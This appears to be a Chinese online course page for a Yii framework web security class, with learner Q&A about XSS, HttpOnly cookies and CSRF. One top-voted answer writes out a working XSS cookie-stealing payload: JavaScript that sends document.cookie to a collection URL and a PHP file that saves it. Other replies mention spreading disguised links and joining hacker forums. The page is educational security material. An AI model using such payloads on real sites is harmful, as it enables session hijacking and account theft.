为了账号安全,请及时绑定邮箱和手机立即绑定

Yii框架不得不说的故事—安全篇(3)

withy PHP开发工程师
难度中级
时长 3小时 1分
学习人数
综合评分9.77
55人评价 查看评价
9.8 内容实用
9.9 简洁易懂
9.6 逻辑清晰

最新回答 / 慕神7058616
 如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,httponly只有这几个功能,不会影响其他操作

最新回答 / kampfdong
目前找到一种行之有效的折中方案,利用工具抓包本地回路,再用wireshark分析。<...图片...>

最赞回答 / 慕斯卡4780385
一般正常用户谁没事去禁用cookie  有心得人禁用了 服务器不让提交正好合适

最新回答 / 锋君
因为你拿到這个页面的数据,是通过后台一系列验证的,

最新回答 / 慕婉清1471766
可能是你使用的浏览器自动拦截了弹窗,你换个浏览器试试

最赞回答 / 北城慕容雪
js里面:var cookie = document.cookie;window.location.href='http://127.0.0.1/index.php?cookie='+cookie;index.php文件里面:<?phpfile_put_contents('cookie.txt', $_GET['cookie']);

最新回答 / 乐园的苏打水
是把写好的链接散播到网上伪装起来,诱导别人,当浏览者点击链接时,不就在浏览者的电脑上执行了,我也是刚学的,小白一个,说错了,您别介意

最新回答 / 宝慕林6154172
视频拍的很好   短视频有助于 学习乐趣  不至于苦闷 

最新回答 / 薛景老师
老师也说了,是IE6之后的版本才有这个httponly的,那么就是说IE6之前的版本是可以获得相关的cookie信息的,老师能讲出来的攻击方法肯定是过时的,你想知道最新的攻击方法,一定要去加黑客群,或者关注黑客论坛。

最新回答 / koumu
同样提问,一起让老师看到
首页上一页12下一页尾页
课程须知
学习本门课程之前,建议先了解一下知识,会更有助于理解和掌握本门课程 1、掌握PHP基本的语言语法 2、了解sql语句和数据库 3、对互联网安全有一定的了解
老师告诉你能学到什么?
1、XSS、CSRF、SQL注入、文件上传漏洞等攻击方式。 2、YII框架中使用的lexer解析、cookie校验、pdo防范措施。

微信扫码,参与3人拼团

意见反馈 帮助中心 APP下载
官方微信
友情提示:

您好,此课程属于迁移课程,您已购买该课程,无需重复购买,感谢您对慕课网的支持!

本次提问将花费2个积分

你的积分不足,无法发表

为什么扣积分?

本次提问将花费2个积分

继续发表请点击 "确定"

为什么扣积分?

举报

0/150
提交
取消